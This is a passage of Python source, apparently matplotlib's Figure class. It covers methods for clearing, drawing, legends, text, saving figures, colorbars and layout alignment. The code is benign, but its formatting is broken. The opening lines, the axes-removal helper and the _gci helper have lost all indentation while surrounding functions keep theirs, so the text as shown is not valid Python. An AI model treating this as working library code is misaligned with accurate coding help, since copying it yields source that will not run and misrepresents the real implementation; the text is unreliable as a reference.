majfmt.axis.isDefault_majfmt = True
majloc = axis.get_major_locator()
isDefault = majloc.axis.isDefault_majloc
axis.set_major_locator(majloc)
if isDefault:
majloc.axis.isDefault_majloc = True
minfmt = axis.get_minor_formatter()
isDefault = majloc.axis.isDefault_minfmt
axis.set_minor_formatter(minfmt)
if isDefault:
minfmt.axis.isDefault_minfmt = True
minloc = axis.get_minor_locator()
isDefault = majloc.axis.isDefault_minloc
axis.set_minor_locator(minloc)
if isDefault:
minloc.axis.isDefault_minloc = True
def _break_share_link(ax, grouper):
siblings = grouper.get_siblings(ax)
if len(siblings) > 1:
grouper.remove(ax)
for last_ax in siblings:
if ax is not last_ax:
return last_ax
return None
self.delaxes(ax)
last_ax = _break_share_link(ax, ax._shared_y_axes)
if last_ax is not None:
_reset_locators_and_formatters(last_ax.yaxis)
last_ax = _break_share_link(ax, ax._shared_x_axes)
if last_ax is not None:
_reset_locators_and_formatters(last_ax.xaxis)
def clf(self, keep_observers=False):
    """
    Clear the figure.

    Set *keep_observers* to True if, for example,
    a gui widget is tracking the axes in the figure.
    """
    self.suppressComposite = None
    # Replacing the registry disconnects every callback previously
    # connected to this figure.
    self.callbacks = cbook.CallbackRegistry()

    for ax in tuple(self.axes):  # Iterate over the copy.
        ax.cla()
        self.delaxes(ax)  # removes ax from self._axstack

    # Keep an attached toolbar (if any) in sync with the cleared figure.
    toolbar = getattr(self.canvas, 'toolbar', None)
    if toolbar is not None:
        toolbar.update()
    self._axstack.clear()
    self.artists = []
    self.lines = []
    self.patches = []
    self.texts = []
    self.images = []
    self.legends = []
    if not keep_observers:
        self._axobservers = []
    self._suptitle = None
    if self.get_constrained_layout():
        # Tear down the constrained-layout solver tree as well.
        layoutbox.nonetree(self._layoutbox)
    self.stale = True
def clear(self, keep_observers=False):
    """Clear the figure; synonym for :meth:`clf`."""
    # Delegate entirely to clf so both entry points behave identically.
    self.clf(keep_observers=keep_observers)
@allow_rasterization
def draw(self, renderer):
    """
    Render the figure using :class:`matplotlib.backend_bases.RendererBase`
    instance *renderer*.
    """
    # draw the figure bounding box, perhaps none for white figure
    if not self.get_visible():
        return

    artists = self.get_children()
    # The figure patch is drawn explicitly first (below), so keep it out
    # of the z-sorted artist list.
    artists.remove(self.patch)
    artists = sorted(
        (artist for artist in artists if not artist.get_animated()),
        key=lambda artist: artist.get_zorder())

    # Apply aspect ratios before any layout is computed, both for the
    # axes themselves and for any aspect-carrying children.
    for ax in self.axes:
        locator = ax.get_axes_locator()
        if locator:
            pos = locator(ax, renderer)
            ax.apply_aspect(pos)
        else:
            ax.apply_aspect()

        for child in ax.get_children():
            if hasattr(child, 'apply_aspect'):
                locator = child.get_axes_locator()
                if locator:
                    pos = locator(child, renderer)
                    child.apply_aspect(pos)
                else:
                    child.apply_aspect()

    try:
        renderer.open_group('figure', gid=self.get_gid())
        # Run the layout engines (if enabled) before drawing anything.
        if self.get_constrained_layout() and self.axes:
            self.execute_constrained_layout(renderer)
        if self.get_tight_layout() and self.axes:
            try:
                self.tight_layout(renderer,
                                  **self._tight_parameters)
            except ValueError:
                pass
                # ValueError can occur when resizing a window.

        self.patch.draw(renderer)
        mimage._draw_list_compositing_images(
            renderer, self, artists, self.suppressComposite)

        renderer.close_group('figure')
    finally:
        # Mark the figure not-stale even if drawing raised part-way.
        self.stale = False

    self._cachedRenderer = renderer
    self.canvas.draw_event(renderer)
def draw_artist(self, a):
    """
    Draw :class:`matplotlib.artist.Artist` instance *a* only.

    This is available only after the figure is drawn.
    """
    # A renderer is only cached by a prior full draw; without one we
    # cannot draw a single artist.
    renderer = self._cachedRenderer
    if renderer is None:
        raise AttributeError("draw_artist can only be used after an "
                             "initial draw which caches the renderer")
    a.draw(renderer)
def get_axes(self):
    """
    Return a list of axes in the Figure.  You can access and modify the
    axes in the Figure through this list.

    Do not modify the list itself.  Instead, use `~Figure.add_axes`,
    `~.Figure.subplot` or `~.Figure.delaxes` to add or remove an axes.

    Note: This is equivalent to the property `~.Figure.axes`.
    """
    # Expose the live list; callers must not mutate it directly.
    return self.axes
# Note: in the docstring below, the newlines in the examples after the
# calls to legend() allow replacing it with figlegend() to generate the
# docstring of pyplot.figlegend.
@docstring.dedent_interpd
def legend(self, *args, **kwargs):
    """
    Place a legend on the figure.

    To make a legend from existing artists on every axes::

      legend()

    To make a legend for a list of lines and labels::

      legend(
          (line1, line2, line3),
          ('label1', 'label2', 'label3'),
          loc='upper right')

    These can also be specified by keyword::

      legend(
          handles=(line1, line2, line3),
          labels=('label1', 'label2', 'label3'),
          loc='upper right')

    Parameters
    ----------
    handles : list of `.Artist`, optional
        A list of Artists (lines, patches) to be added to the legend.
        Use this together with *labels*, if you need full control on what
        is shown in the legend and the automatic mechanism described above
        is not sufficient.

        The length of handles and labels should be the same in this
        case. If they are not, they are truncated to the smaller length.

    labels : list of str, optional
        A list of labels to show next to the artists.
        Use this together with *handles*, if you need full control on what
        is shown in the legend and the automatic mechanism described above
        is not sufficient.

    Other Parameters
    ----------------
    %(_legend_kw_doc)s

    Returns
    -------
    :class:`matplotlib.legend.Legend` instance

    Notes
    -----
    Not all kinds of artist are supported by the legend command. See
    :doc:`/tutorials/intermediate/legend_guide` for details.
    """
    # Normalize the many supported call signatures into explicit
    # handles/labels lists plus any remaining positional arguments.
    handles, labels, extra_args, kwargs = mlegend._parse_legend_args(
            self.axes,
            *args,
            **kwargs)
    # check for third arg
    if len(extra_args):
        # NOTE(review): this branch is currently a no-op; the deprecation
        # below was disabled and extra positional args are simply passed
        # through to Legend.
        # cbook.warn_deprecated(
        #     "2.1",
        #     message="Figure.legend will accept no more than two "
        #     "positional arguments in the future. Use "
        #     "'fig.legend(handles, labels, loc=location)' "
        #     "instead.")
        # kwargs['loc'] = extra_args[0]
        # extra_args = extra_args[1:]
        pass
    l = mlegend.Legend(self, handles, labels, *extra_args, **kwargs)
    self.legends.append(l)
    # Allow legend.remove() to unregister itself from this figure.
    l._remove_method = self.legends.remove
    self.stale = True
    return l
@cbook._delete_parameter("3.1", "withdash")
@docstring.dedent_interpd
def text(self, x, y, s, fontdict=None, withdash=False, **kwargs):
    """
    Add text to figure.

    Parameters
    ----------
    x, y : float
        The position to place the text. By default, this is in figure
        coordinates, floats in [0, 1]. The coordinate system can be changed
        using the *transform* keyword.

    s : str
        The text string.

    fontdict : dictionary, optional, default: None
        A dictionary to override the default text properties. If fontdict
        is None, the defaults are determined by your rc parameters. A
        property in *kwargs* override the same property in fontdict.

    withdash : boolean, optional, default: False
        Creates a `~matplotlib.text.TextWithDash` instance instead of a
        `~matplotlib.text.Text` instance.

    Other Parameters
    ----------------
    **kwargs : `~matplotlib.text.Text` properties
        Other miscellaneous text parameters.
        %(Text)s

    Returns
    -------
    text : `~.text.Text`

    See Also
    --------
    .Axes.text
    .pyplot.text
    """
    default = dict(transform=self.transFigure)

    # Only honor *withdash* when the caller actually passed a truthy
    # value; the decorator substitutes a sentinel when the (deprecated)
    # parameter is left at its default.
    if (withdash
            and withdash is not cbook.deprecation._deprecated_parameter):
        text = TextWithDash(x=x, y=y, text=s)
    else:
        text = Text(x=x, y=y, text=s)
    text.update(default)
    if fontdict is not None:
        text.update(fontdict)
    # Explicit keyword arguments win over both defaults and fontdict.
    text.update(kwargs)

    text.set_figure(self)
    text.stale_callback = _stale_figure_callback

    self.texts.append(text)
    # Allow text.remove() to unregister itself from this figure.
    text._remove_method = self.texts.remove
    self.stale = True
    return text
def _set_artist_props(self, a):
    # Attach artist *a* to this figure: set its figure reference and
    # stale-propagation callback (unless *a* is the figure itself), and
    # default its transform to figure coordinates.
    if a != self:
        a.set_figure(self)
        a.stale_callback = _stale_figure_callback
    a.set_transform(self.transFigure)
@docstring.dedent_interpd
def gca(self, **kwargs):
    """
    Get the current axes, creating one if necessary.

    The following kwargs are supported for ensuring the returned axes
    adheres to the given projection etc., and for axes creation if
    the active axes does not exist:

    %(Axes)s

    """
    ckey, cax = self._axstack.current_key_axes()
    # if there exists an axes on the stack see if it matches
    # the desired axes configuration
    if cax is not None:

        # if no kwargs are given just return the current axes
        # this is a convenience for gca() on axes such as polar etc.
        if not kwargs:
            return cax

        # if the user has specified particular projection detail
        # then build up a key which can represent this
        else:
            projection_class, _, key = \
                self._process_projection_requirements(**kwargs)

            # let the returned axes have any gridspec by removing it from
            # the key
            ckey = ckey[1:]
            key = key[1:]

            # if the cax matches this key then return the axes, otherwise
            # continue and a new axes will be created
            if key == ckey and isinstance(cax, projection_class):
                return cax
            else:
                cbook._warn_external('Requested projection is different '
                                     'from current axis projection, '
                                     'creating new axis with requested '
                                     'projection.')

    # no axes found, so create one which spans the figure
    return self.add_subplot(1, 1, 1, **kwargs)
def sca(self, a):
    """Make *a* the current axes and return it."""
    # Move *a* to the top of the axes stack so gca() finds it first.
    self._axstack.bubble(a)
    # Notify every registered axes observer of the change.
    for observer in self._axobservers:
        observer(self)
    return a
def _gci(self):
"""
Helper for :func:`~matplotlib.pyplot.gci`. Do not use elsewhere.
"""
# Look first for an image in the current Axes:
cax = self._axstack.current_key_axes()[1]
if cax is None:
return None
im = cax._gci()
if im is not None:
return im
# If there is no image in the current Axes, search for
# one in a previously created Axes. Whether this makes
# sense is debatable, but it is the documented behavior.
for ax in reversed(self.axes):
im = ax._gci()
if im is not None:
return im
return None
def __getstate__(self):
    """Return the picklable state, stripping unpicklable attributes."""
    state = super().__getstate__()

    # the axobservers cannot currently be pickled.
    # Additionally, the canvas cannot currently be pickled, but this has
    # the benefit of meaning that a figure can be detached from one canvas,
    # and re-attached to another.
    for attr_to_pop in ('_axobservers', 'show',
                        'canvas', '_cachedRenderer'):
        state.pop(attr_to_pop, None)

    # add version information to the state
    state['__mpl_version__'] = _mpl_version

    # check whether the figure manager (if any) is registered with pyplot
    from matplotlib import _pylab_helpers
    if getattr(self.canvas, 'manager', None) \
            in _pylab_helpers.Gcf.figs.values():
        # Flag so __setstate__ re-registers the figure with pyplot.
        state['_restore_to_pylab'] = True

    # set all the layoutbox information to None. kiwisolver objects can't
    # be pickled, so we lose the layout options at this point.
    state.pop('_layoutbox', None)
    # suptitle:
    if self._suptitle is not None:
        self._suptitle._layoutbox = None

    return state
def __setstate__(self, state):
    """Restore pickled state and optionally re-register with pyplot."""
    version = state.pop('__mpl_version__')
    restore_to_pylab = state.pop('_restore_to_pylab', False)

    if version != _mpl_version:
        cbook._warn_external(
            f"This figure was saved with matplotlib version {version} and "
            f"is unlikely to function correctly.")

    self.__dict__ = state

    # re-initialise some of the unstored state information
    self._axobservers = []
    self.canvas = None
    self._layoutbox = None

    if restore_to_pylab:
        # lazy import to avoid circularity
        import matplotlib.pyplot as plt
        import matplotlib._pylab_helpers as pylab_helpers
        allnums = plt.get_fignums()
        # Give the restored figure a fresh, unused figure number.
        num = max(allnums) + 1 if allnums else 1
        mgr = plt._backend_mod.new_figure_manager_given_figure(num, self)

        # XXX The following is a copy and paste from pyplot. Consider
        # factoring to pylab_helpers

        if self.get_label():
            mgr.set_window_title(self.get_label())

        # make this figure current on button press event
        def make_active(event):
            pylab_helpers.Gcf.set_active(mgr)

        mgr._cidgcf = mgr.canvas.mpl_connect('button_press_event',
                                             make_active)

        pylab_helpers.Gcf.set_active(mgr)
        self.number = num

        plt.draw_if_interactive()
    self.stale = True
def add_axobserver(self, func):
    """Whenever the axes state change, ``func(self)`` will be called."""
    # Observers are invoked in registration order (see sca()).
    self._axobservers.append(func)
def savefig(self, fname, *, transparent=None, **kwargs):
    """
    Save the current figure.

    Call signature::

      savefig(fname, dpi=None, facecolor='w', edgecolor='w',
              orientation='portrait', papertype=None, format=None,
              transparent=False, bbox_inches=None, pad_inches=0.1,
              frameon=None, metadata=None)

    The output formats available depend on the backend being used.

    Parameters
    ----------
    fname : str or PathLike or file-like object
        A path, or a Python file-like object, or
        possibly some backend-dependent object such as
        `matplotlib.backends.backend_pdf.PdfPages`.

        If *format* is not set, then the output format is inferred from
        the extension of *fname*, if any, and from :rc:`savefig.format`
        otherwise.  If *format* is set, it determines the output format.

        Hence, if *fname* is not a path or has no extension, remember to
        specify *format* to ensure that the correct backend is used.

    Other Parameters
    ----------------
    dpi : [ *None* | scalar > 0 | 'figure' ]
        The resolution in dots per inch.  If *None*, defaults to
        :rc:`savefig.dpi`.  If 'figure', uses the figure's dpi value.

    quality : [ *None* | 1 <= scalar <= 100 ]
        The image quality, on a scale from 1 (worst) to 95 (best).
        Applicable only if *format* is jpg or jpeg, ignored otherwise.
        If *None*, defaults to :rc:`savefig.jpeg_quality` (95 by default).
        Values above 95 should be avoided; 100 completely disables the
        JPEG quantization stage.

    optimize : bool
        If *True*, indicates that the JPEG encoder should make an extra
        pass over the image in order to select optimal encoder settings.
        Applicable only if *format* is jpg or jpeg, ignored otherwise.
        Is *False* by default.

    progressive : bool
        If *True*, indicates that this image should be stored as a
        progressive JPEG file. Applicable only if *format* is jpg or
        jpeg, ignored otherwise. Is *False* by default.

    facecolor : color or None, optional
        The facecolor of the figure; if *None*, defaults to
        :rc:`savefig.facecolor`.

    edgecolor : color or None, optional
        The edgecolor of the figure; if *None*, defaults to
        :rc:`savefig.edgecolor`

    orientation : {'landscape', 'portrait'}
        Currently only supported by the postscript backend.

    papertype : str
        One of 'letter', 'legal', 'executive', 'ledger', 'a0' through
        'a10', 'b0' through 'b10'. Only supported for postscript
        output.

    format : str
        The file format, e.g. 'png', 'pdf', 'svg', ... The behavior when
        this is unset is documented under *fname*.

    transparent : bool
        If *True*, the axes patches will all be transparent; the
        figure patch will also be transparent unless facecolor
        and/or edgecolor are specified via kwargs.
        This is useful, for example, for displaying
        a plot on top of a colored background on a web page.  The
        transparency of these patches will be restored to their
        original values upon exit of this function.

    bbox_inches : str or `~matplotlib.transforms.Bbox`, optional
        Bbox in inches. Only the given portion of the figure is
        saved. If 'tight', try to figure out the tight bbox of
        the figure. If None, use savefig.bbox

    pad_inches : scalar, optional
        Amount of padding around the figure when bbox_inches is
        'tight'. If None, use savefig.pad_inches

    bbox_extra_artists : list of `~matplotlib.artist.Artist`, optional
        A list of extra artists that will be considered when the
        tight bbox is calculated.

    metadata : dict, optional
        Key/value pairs to store in the image metadata. The supported keys
        and defaults depend on the image format and backend:

        - 'png' with Agg backend: See the parameter ``metadata`` of
          `~.FigureCanvasAgg.print_png`.
        - 'pdf' with pdf backend: See the parameter ``metadata`` of
          `~.backend_pdf.PdfPages`.
        - 'eps' and 'ps' with PS backend: Only 'Creator' is supported.

    pil_kwargs : dict, optional
        Additional keyword arguments that are passed to `PIL.Image.save`
        when saving the figure. Only applicable for formats that are saved
        using Pillow, i.e. JPEG, TIFF, and (if the keyword is set to a
        non-None value) PNG.
    """
    kwargs.setdefault('dpi', rcParams['savefig.dpi'])
    if "frameon" in kwargs:
        # Deprecated alias controlling the figure patch visibility.
        cbook.warn_deprecated("3.1", name="frameon", obj_type="kwarg",
                              alternative="facecolor")
        frameon = kwargs.pop("frameon")
        if frameon is None:
            # Deliberately bypass the rcParams deprecation machinery.
            frameon = dict.__getitem__(rcParams, 'savefig.frameon')
    else:
        frameon = False  # Won't pass "if frameon:" below.
    if transparent is None:
        transparent = rcParams['savefig.transparent']

    if transparent:
        kwargs.setdefault('facecolor', 'none')
        kwargs.setdefault('edgecolor', 'none')
        # Temporarily blank out each axes patch; colors are restored
        # after printing (see the final loop below).
        original_axes_colors = []
        for ax in self.axes:
            patch = ax.patch
            original_axes_colors.append((patch.get_facecolor(),
                                         patch.get_edgecolor()))
            patch.set_facecolor('none')
            patch.set_edgecolor('none')
    else:
        kwargs.setdefault('facecolor', rcParams['savefig.facecolor'])
        kwargs.setdefault('edgecolor', rcParams['savefig.edgecolor'])

    if frameon:
        original_frameon = self.patch.get_visible()
        self.patch.set_visible(frameon)

    self.canvas.print_figure(fname, **kwargs)

    if frameon:
        self.patch.set_visible(original_frameon)

    if transparent:
        # Restore the axes patch colors saved above.
        for ax, cc in zip(self.axes, original_axes_colors):
            ax.patch.set_facecolor(cc[0])
            ax.patch.set_edgecolor(cc[1])
@docstring.dedent_interpd
def colorbar(self, mappable, cax=None, ax=None, use_gridspec=True, **kw):
    """
    Create a colorbar for a ScalarMappable instance, *mappable*.

    Documentation for the pyplot thin wrapper:
    %(colorbar_doc)s
    """
    if ax is None:
        ax = self.gca()

    # Remember the active axes; creating the colorbar axes below can
    # change it, and we restore it before returning.
    previous_ax = self.gca()
    if cax is None:
        use_spec = (use_gridspec
                    and isinstance(ax, SubplotBase)
                    and not self.get_constrained_layout())
        maker = cbar.make_axes_gridspec if use_spec else cbar.make_axes
        cax, kw = maker(ax, **kw)

    # Strip kwargs that only the make_axes* helpers understand before
    # handing the remainder to the Colorbar itself.
    non_colorbar_keys = {'fraction', 'pad', 'shrink', 'aspect', 'anchor',
                         'panchor'}
    cb = cbar.colorbar_factory(
        cax, mappable,
        **{key: value for key, value in kw.items()
           if key not in non_colorbar_keys})

    self.sca(previous_ax)
    self.stale = True
    return cb
def subplots_adjust(self, left=None, bottom=None, right=None, top=None,
                    wspace=None, hspace=None):
    """
    Update the :class:`SubplotParams` with *kwargs* (defaulting to rc when
    *None*) and update the subplot locations.
    """
    if self.get_constrained_layout():
        # Manual subplot parameters and constrained layout cannot
        # coexist; turn the latter off and warn.
        self.set_constrained_layout(False)
        cbook._warn_external("This figure was using "
                             "constrained_layout==True, but that is "
                             "incompatible with subplots_adjust and or "
                             "tight_layout: setting "
                             "constrained_layout==False. ")
    self.subplotpars.update(left, bottom, right, top, wspace, hspace)
    for ax in self.axes:
        if not isinstance(ax, SubplotBase):
            # Check if sharing a subplots axis
            if isinstance(ax._sharex, SubplotBase):
                ax._sharex.update_params()
                ax.set_position(ax._sharex.figbox)
            elif isinstance(ax._sharey, SubplotBase):
                ax._sharey.update_params()
                ax.set_position(ax._sharey.figbox)
        else:
            ax.update_params()
            ax.set_position(ax.figbox)
    self.stale = True
def ginput(self, n=1, timeout=30, show_clicks=True, mouse_add=1,
           mouse_pop=3, mouse_stop=2):
    """
    Blocking call to interact with a figure.

    Wait until the user clicks *n* times on the figure, and return the
    coordinates of each click in a list.

    There are three possible interactions:

    - Add a point.
    - Remove the most recently added point.
    - Stop the interaction and return the points added so far.

    The actions are assigned to mouse buttons via the arguments
    *mouse_add*, *mouse_pop* and *mouse_stop*.  Mouse buttons are defined
    by the numbers:

    - 1: left mouse button
    - 2: middle mouse button
    - 3: right mouse button
    - None: no mouse button

    Parameters
    ----------
    n : int, optional, default: 1
        Number of mouse clicks to accumulate. If negative, accumulate
        clicks until the input is terminated manually.
    timeout : scalar, optional, default: 30
        Number of seconds to wait before timing out. If zero or negative
        will never timeout.
    show_clicks : bool, optional, default: True
        If True, show a red cross at the location of each click.
    mouse_add : {1, 2, 3, None}, optional, default: 1 (left click)
        Mouse button used to add points.
    mouse_pop : {1, 2, 3, None}, optional, default: 3 (right click)
        Mouse button used to remove the most recently added point.
    mouse_stop : {1, 2, 3, None}, optional, default: 2 (middle click)
        Mouse button used to stop input.

    Returns
    -------
    points : list of tuples
        A list of the clicked (x, y) coordinates.

    Notes
    -----
    The keyboard can also be used to select points in case your mouse
    does not have one or more of the buttons.  The delete and backspace
    keys act like right clicking (i.e., remove last point), the enter key
    terminates input and any other key (not already used by the window
    manager) selects a point.
    """
    # Build the blocking helper and immediately run it; all the real
    # event handling lives in BlockingMouseInput.
    collector = BlockingMouseInput(self,
                                   mouse_add=mouse_add,
                                   mouse_pop=mouse_pop,
                                   mouse_stop=mouse_stop)
    return collector(n=n, timeout=timeout, show_clicks=show_clicks)
def waitforbuttonpress(self, timeout=-1):
    """
    Blocking call to interact with the figure.

    Returns True if a key was pressed, False if a mouse button was
    pressed, and None if *timeout* was reached without either being
    pressed.

    If *timeout* is negative, does not timeout.
    """
    # Delegate event collection to the blocking input helper.
    return BlockingKeyMouseInput(self)(timeout=timeout)
def get_default_bbox_extra_artists(self):
    """Return artists that should be considered for the tight bbox."""
    # Visible, layout-participating children of the figure itself ...
    artists = [child for child in self.get_children()
               if child.get_visible() and child.get_in_layout()]
    # ... plus the default extra artists of every visible axes.
    for ax in self.axes:
        if ax.get_visible():
            artists.extend(ax.get_default_bbox_extra_artists())
    return artists
def get_tightbbox(self, renderer, bbox_extra_artists=None):
    """
    Return a (tight) bounding box of the figure in inches.

    Artists that have ``artist.set_in_layout(False)`` are not included
    in the bbox.

    Parameters
    ----------
    renderer : `.RendererBase` instance
        renderer that will be used to draw the figures (i.e.
        ``fig.canvas.get_renderer()``)

    bbox_extra_artists : list of `.Artist` or ``None``
        List of artists to include in the tight bounding box.  If
        ``None`` (default), then all artist children of each axes are
        included in the tight bounding box.

    Returns
    -------
    bbox : `.BboxBase`
        containing the bounding box (in figure inches).
    """
    bb = []
    if bbox_extra_artists is None:
        artists = self.get_default_bbox_extra_artists()
    else:
        artists = bbox_extra_artists

    for a in artists:
        bbox = a.get_tightbbox(renderer)
        # Skip degenerate (zero-area) artist boxes.
        if bbox is not None and (bbox.width != 0 or bbox.height != 0):
            bb.append(bbox)

    for ax in self.axes:
        if ax.get_visible():
            # some axes don't take the bbox_extra_artists kwarg so we
            # need this conditional....
            try:
                bbox = ax.get_tightbbox(renderer,
                        bbox_extra_artists=bbox_extra_artists)
            except TypeError:
                bbox = ax.get_tightbbox(renderer)
            bb.append(bbox)

    # Drop non-finite and degenerate boxes before taking the union.
    bb = [b for b in bb
          if (np.isfinite(b.width) and np.isfinite(b.height)
              and (b.width != 0 or b.height != 0))]

    if len(bb) == 0:
        return self.bbox_inches

    _bbox = Bbox.union(bb)

    # Convert from display units to inches.
    bbox_inches = TransformedBbox(_bbox, Affine2D().scale(1 / self.dpi))

    return bbox_inches
def init_layoutbox(self):
    """Initialize the layoutbox for use in constrained_layout."""
    if self._layoutbox is not None:
        # Already initialized; nothing to do.
        return
    self._layoutbox = layoutbox.LayoutBox(parent=None,
                                          name='figlb',
                                          artist=self)
    # The figure's layoutbox always spans the full unit square.
    self._layoutbox.constrain_geometry(0., 0., 1., 1.)
def execute_constrained_layout(self, renderer=None):
    """
    Use ``layoutbox`` to determine pos positions within axes.

    See also `.set_constrained_layout_pads`.
    """
    from matplotlib._constrained_layout import do_constrained_layout

    _log.debug('Executing constrainedlayout')
    if self._layoutbox is None:
        # Nothing to solve: the figure was never set up for constrained
        # layout, so warn and bail out instead of raising.
        cbook._warn_external("Calling figure.constrained_layout, but "
                             "figure not setup to do constrained layout. "
                             " You either called GridSpec without the "
                             "fig keyword, you are using plt.subplot, "
                             "or you need to call figure or subplots "
                             "with the constrained_layout=True kwarg.")
        return
    w_pad, h_pad, wspace, hspace = self.get_constrained_layout_pads()
    # convert to unit-relative lengths
    fig = self
    width, height = fig.get_size_inches()
    w_pad = w_pad / width
    h_pad = h_pad / height
    if renderer is None:
        renderer = layoutbox.get_renderer(fig)
    do_constrained_layout(fig, renderer, h_pad, w_pad, hspace, wspace)
def tight_layout(self, renderer=None, pad=1.08, h_pad=None, w_pad=None,
                 rect=None):
    """
    Automatically adjust subplot parameters to give specified padding.

    To exclude an artist on the axes from the bounding box calculation
    that determines the subplot parameters (i.e. legend, or annotation),
    then set `a.set_in_layout(False)` for that artist.

    Parameters
    ----------
    renderer : subclass of `~.backend_bases.RendererBase`, optional
        Defaults to the renderer for the figure.
    pad : float, optional
        Padding between the figure edge and the edges of subplots,
        as a fraction of the font size.
    h_pad, w_pad : float, optional
        Padding (height/width) between edges of adjacent subplots,
        as a fraction of the font size.  Defaults to *pad*.
    rect : tuple (left, bottom, right, top), optional
        A rectangle (left, bottom, right, top) in the normalized
        figure coordinate that the whole subplots area (including
        labels) will fit into. Default is (0, 0, 1, 1).

    See Also
    --------
    .Figure.set_tight_layout
    .pyplot.tight_layout
    """
    from .tight_layout import (
        get_renderer, get_subplotspec_list, get_tight_layout_figure)

    subplotspec_list = get_subplotspec_list(self.axes)
    if None in subplotspec_list:
        # Axes without a SubplotSpec (e.g. added via add_axes) cannot be
        # repositioned by the tight-layout engine.
        cbook._warn_external("This figure includes Axes that are not "
                             "compatible with tight_layout, so results "
                             "might be incorrect.")

    if renderer is None:
        renderer = get_renderer(self)

    kwargs = get_tight_layout_figure(
        self, self.axes, subplotspec_list, renderer,
        pad=pad, h_pad=h_pad, w_pad=w_pad, rect=rect)
    if kwargs:
        self.subplots_adjust(**kwargs)
def align_xlabels(self, axs=None):
    """
    Align the xlabels of subplots in the same subplot row if label
    alignment is being done automatically (i.e. the label position is
    not manually set).

    Alignment persists for draw events after this is called.

    If a label is on the bottom, it is aligned with labels on axes that
    also have their label on the bottom and that have the same
    bottom-most subplot row.  If the label is on the top,
    it is aligned with labels on axes with the same top-most row.

    Parameters
    ----------
    axs : list of `~matplotlib.axes.Axes`
        Optional list of (or ndarray) `~matplotlib.axes.Axes`
        to align the xlabels.
        Default is to align all axes on the figure.

    See Also
    --------
    matplotlib.figure.Figure.align_ylabels
    matplotlib.figure.Figure.align_labels

    Notes
    -----
    This assumes that ``axs`` are from the same `.GridSpec`, so that
    their `.SubplotSpec` positions correspond to figure positions.

    Examples
    --------
    Example with rotated xtick labels::

        fig, axs = plt.subplots(1, 2)
        for tick in axs[0].get_xticklabels():
            tick.set_rotation(55)
        axs[0].set_xlabel('XLabel 0')
        axs[1].set_xlabel('XLabel 1')
        fig.align_xlabels()
    """
    if axs is None:
        axs = self.axes
    axs = np.asarray(axs).ravel()
    for ax in axs:
        _log.debug(' Working on: %s', ax.get_xlabel())
        ss = ax.get_subplotspec()
        nrows, ncols, row0, row1, col0, col1 = ss.get_rows_columns()
        labpo = ax.xaxis.get_label_position()  # top or bottom
        # Loop through other axes and search for label positions that
        # are same as this one and that share the appropriate row
        # number.
        # Add to a grouper associated with each axes of siblings.
        # This list is inspected in `axis.draw` by
        # `axis._update_label_position`.
        for axc in axs:
            if axc.xaxis.get_label_position() == labpo:
                ss = axc.get_subplotspec()
                # Use distinct candidate names (rowc0/rowc1/colc0/colc1)
                # so the outer row0/row1/col0/col1 are not clobbered
                # (the old code reused `col1` here).
                nrows, ncols, rowc0, rowc1, colc0, colc1 = \
                    ss.get_rows_columns()
                if (labpo == 'bottom' and rowc1 == row1 or
                        labpo == 'top' and rowc0 == row0):
                    # grouper for groups of xlabels to align
                    self._align_xlabel_grp.join(ax, axc)
def align_ylabels(self, axs=None):
    """
    Align the ylabels of subplots in the same subplot column if label
    alignment is being done automatically (i.e. the label position is
    not manually set).

    Alignment persists for draw events after this is called.

    If a label is on the left, it is aligned with labels on axes that
    also have their label on the left and that have the same
    left-most subplot column.  If the label is on the right,
    it is aligned with labels on axes with the same right-most column.

    Parameters
    ----------
    axs : list of `~matplotlib.axes.Axes`
        Optional list (or ndarray) of `~matplotlib.axes.Axes`
        to align the ylabels.
        Default is to align all axes on the figure.

    See Also
    --------
    matplotlib.figure.Figure.align_xlabels
    matplotlib.figure.Figure.align_labels

    Notes
    -----
    This assumes that ``axs`` are from the same `.GridSpec`, so that
    their `.SubplotSpec` positions correspond to figure positions.

    Examples
    --------
    Example with large yticks labels::

        fig, axs = plt.subplots(2, 1)
        axs[0].plot(np.arange(0, 1000, 50))
        axs[0].set_ylabel('YLabel 0')
        axs[1].set_ylabel('YLabel 1')
        fig.align_ylabels()
    """
    if axs is None:
        axs = self.axes
    axs = np.asarray(axs).ravel()
    for ax in axs:
        _log.debug(' Working on: %s', ax.get_ylabel())
        ss = ax.get_subplotspec()
        nrows, ncols, row0, row1, col0, col1 = ss.get_rows_columns()
        labpo = ax.yaxis.get_label_position()  # left or right
        # loop through other axes, and search for label positions
        # that are same as this one, and that share the appropriate
        # column number.
        # Add to a list associated with each axes of siblings.
        # This list is inspected in `axis.draw` by
        # `axis._update_label_position`.
        for axc in axs:
            if axc != ax:
                if axc.yaxis.get_label_position() == labpo:
                    ss = axc.get_subplotspec()
                    nrows, ncols, row0, row1, colc0, colc1 = \
                        ss.get_rows_columns()
                    if (labpo == 'left' and colc0 == col0 or
                            labpo == 'right' and colc1 == col1):
                        # grouper for groups of ylabels to align
                        self._align_ylabel_grp.join(ax, axc)
def align_labels(self, axs=None):
    """
    Align the xlabels and ylabels of subplots with the same subplots
    row or column (respectively) if label alignment is being
    done automatically (i.e. the label position is not manually set).

    Alignment persists for draw events after this is called.

    Parameters
    ----------
    axs : list of `~matplotlib.axes.Axes`
        Optional list (or ndarray) of `~matplotlib.axes.Axes`
        to align the labels.
        Default is to align all axes on the figure.

    See Also
    --------
    matplotlib.figure.Figure.align_xlabels
    matplotlib.figure.Figure.align_ylabels
    """
    # x labels first, then y labels, matching the individual helpers.
    for align in (self.align_xlabels, self.align_ylabels):
        align(axs=axs)
def add_gridspec(self, nrows, ncols, **kwargs):
    """
    Return a `.GridSpec` that has this figure as a parent.  This allows
    complex layout of axes in the figure.

    Parameters
    ----------
    nrows : int
        Number of rows in grid.

    ncols : int
        Number or columns in grid.

    Returns
    -------
    gridspec : `.GridSpec`

    Other Parameters
    ----------------
    **kwargs
        Keyword arguments are passed to `.GridSpec`.

    See Also
    --------
    matplotlib.pyplot.subplots

    Examples
    --------
    Adding a subplot that spans two rows::

        fig = plt.figure()
        gs = fig.add_gridspec(2, 2)
        ax1 = fig.add_subplot(gs[0, 0])
        ax2 = fig.add_subplot(gs[1, 0])
        # spans two rows:
        ax3 = fig.add_subplot(gs[:, 1])
    """
    # Drop any user-supplied 'figure' kwarg: this gridspec always
    # belongs to *self*.
    kwargs.pop('figure', None)
    gridspec = GridSpec(nrows=nrows, ncols=ncols, figure=self, **kwargs)
    self._gridspecs.append(gridspec)
    return gridspec
def figaspect(arg):
    """
    Calculate the width and height for a figure with a specified aspect ratio.

    While the height is taken from :rc:`figure.figsize`, the width is
    adjusted to match the desired aspect ratio. Additionally, it is ensured
